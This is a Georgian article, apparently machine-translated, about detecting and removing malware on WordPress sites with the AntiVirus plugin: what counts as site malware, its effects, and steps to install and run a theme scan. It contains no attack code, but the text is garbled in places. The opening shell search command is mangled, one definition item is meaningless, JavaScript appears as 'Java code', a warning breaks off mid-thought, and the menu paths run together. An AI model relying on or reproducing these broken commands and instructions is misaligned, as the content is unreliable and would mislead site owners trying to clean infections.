$ fgrep -nr -- მოიცავს \ *. php "$ მნიშვნელობები" *
სადაც არის საიტი, შეიძლება იყოს ვირუსები. ეს მარტივი ჭეშმარიტება არ გაძლევს მოდუნების საშუალებას და მოითხოვს საიტის „ჯანმრთელობის“ მუდმივ მონიტორინგს. WordPress საიტები არ არის გამონაკლისი და თუ გავითვალისწინებთ WordPress CMS-ის პოპულარობას, გასაგებია, რატომ ხდება ეს საიტები უფრო ხშირად ინფიცირებული, ვიდრე სხვა სისტემების საიტები. უამრავი ინსტრუმენტია საიტების ანტივირუსული შემოწმებისთვის. ამ სტატიაში მე გეტყვით WordPress საიტებისთვის შესანიშნავ ვირუსის მებრძოლზე - AntiVirus მოდულზე, როგორ მოვძებნოთ და წავშალოთ ვირუსი WordPress-ზე ანტივირუსის მოდულით.
რას ვგულისხმობთ საიტზე ვირუსში
საიტზე ვირუსი ნიშნავს ნებისმიერ მესამე მხარის პროგრამას, რომელიც აიძულებს საიტს იმუშაოს და არა ისე, როგორც ეს არის სისტემის პროგრამებში. ვირუსის განმარტება მოიცავს:
- საიტზე ჩამოთვლილი;
- დაშიფრული აღმასრულებელი ფუნქციები შესვლის საიტზე დანამატებით და თემებით;
- ნებისმიერი php სკრიპტი და ჯავის კოდი, რომელიც ასრულებს მოქმედებებს, რომლებიც არ არის ცნობილი საიტის მფლობელისთვის.
საიტზე ვირუსების მოქმედების შედეგები შეიძლება იყოს ძალიან მრავალფეროვანი:
- ბმულები მესამე მხარის რესურსებთან;
- ავტომატური გადამისამართება სხვა ადამიანების რესურსებზე;
- ახალი პუბლიკაციების კითხვა და მათი პუბლიკაციების დუბლირება მესამე მხარის რესურსებზე;
- არასანქცირებული რეკლამა საიტზე;
- საიტის კოდის განადგურება და, შედეგად, საიტის ავარია.
ანტივირუსული მოდულის ინსტალაცია და კონფიგურაცია
შესანიშნავი ინსტრუმენტია ვებსაიტის ვირუსების შესამოწმებლად მოდული ანტივირუსი... დანამატს აქვს 90000-ზე მეტი ჩამოტვირთვა, ბოლოს ტესტირება WordPress 4.6.11-ზე.
შეგიძლიათ დააინსტალიროთ დანამატი საიტის კონსოლიდან, დანამატების → ახალი ჩანართზე, მოდულის სახელის საძიებო ფორმის გამოყენებით.
ანტივირუსული მოდულის ინსტალაცია ადმინისტრატორის პანელიდან
როგორ ამოიღოთ ვირუსი WordPress ანტივირუსის დანამატზე
Მნიშვნელოვანი! დანამატთან მუშაობამდე.
მოდული მუშაობს ყოველგვარი სირთულეების გარეშე. გადაღმა პარამეტრები → ანტივირუსიან დანამატები -> ანტივირუსი -> პარამეტრებიჩვენ შევდივართ გააქტიურებული მოდულის გვერდზე.
დააწკაპუნეთ „თემის შაბლონების სკანირებაზე“ და ნახეთ შემოწმების შედეგი. სამუშაო თემების ყველა დირექტორია აისახება გვერდზე. მწვანე ნიშნავს ვირუსების არარსებობას, წითელი ნიშნავს ინფექციას.
სკანირების დაწყება ანტივირუსის მოდულით
